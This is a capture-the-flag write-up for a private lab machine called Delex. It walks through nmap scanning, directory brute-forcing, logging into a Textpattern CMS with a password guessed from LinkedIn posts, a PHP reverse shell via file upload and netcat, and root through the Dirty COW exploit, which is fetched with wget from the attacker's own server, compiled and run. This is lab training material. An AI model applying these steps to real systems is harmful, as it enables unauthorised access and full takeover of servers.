THM-DELEX WRITE-UP

PRIVATE ROOM

https://ehackify.com/

The purpose of delex is to know about basics of Reconnaissance and cms,kernel and privilege-escalation .i am sure that this machine take you through all of this

Table of content

Scanning

namp

Enumeration

dirb or dirbuster

Exploitation

file upload & netcat

Privilege escalation

dirty cow (kernel exploit)

Scanning

(discovery tasks, such as determining which ports and services,vulnerability,OS details were available for targeting hosts, or which subdomains,services were accessible for web applications.)

For scanning i use nmap.Nmap is powerful opensource tool that we can used for scanning hosts,network .It will enumerate what service and version and port,vulnerability are available in the host or network

In scan result its shows that port 80 is open that means a web-application is running on the target host i just visited then a website appear .its name is delex.

i just sneak around the site then i got LinkedIn icon that redirected to a LinkedIn profile that shows its Mayer king and she had post two things .

And posts are all about “lionheart” .I feel that it may be useful for further move so i save the user name and the password as “lionheart”then i brute-force the directory using dirb its shows the directories. There is a directory called “textpattern/textpattern its a login form.i use the user name and “loinheart” found from the LinkedIn to login .

Bingo……….. i got access to it

i search about textpattern then i find out that its free open source content management system based on PHP and MySQL .interesting thing is there is file upload function through that i can upload PHP reverse shell

using PHP reverse shell and “nc” i got access to the server.

i gained access as low privileged user and use shell spawn for get an interactive shell .

python -c ‘import pty; pty.spawn(“/bin/bash”)’

so my next step is “privilege escalation” for that i look for the kernel version it is “3.2.0–4-amd64" and i got a dirty cow vulnerability and it uses the pokemon exploit do that

exploit:https://www.exploit-db.com/exploits/40839

upload the exploit file to the victim system on /tmp directory because in the /tmp directory gives full privilege to modify files any users in the system so i upload the file on /tmp using wget .i create a simple file shearing using python in my system.

python -m SimpleHTTPServer 8000

through that i can download the file using wget.

wget://http://your_ip:port/40839.c

After downloading i complied the file using gcc .It in the exploit how to use the exploit

gcc -pthread 40839.c -o dirty -lcrypt

the file complied as dirty then change file permission to executable

chmod +x dirty

after execute file using

./dirty

it will crate a new user as firefart and create new password for the user

this exploit create a passwd.bak in /tmp/passwd.bak

exit from the shell and regain the access and do the shell spawning and access the new user we created using the exploit

su firefart

***user_passwd***

got root !!!!!!!!!!!!!!!!!!!!! its pwned

and flags in the home directory of users

cyb3r s3cur1ty g33k 4nd R3s34rch3r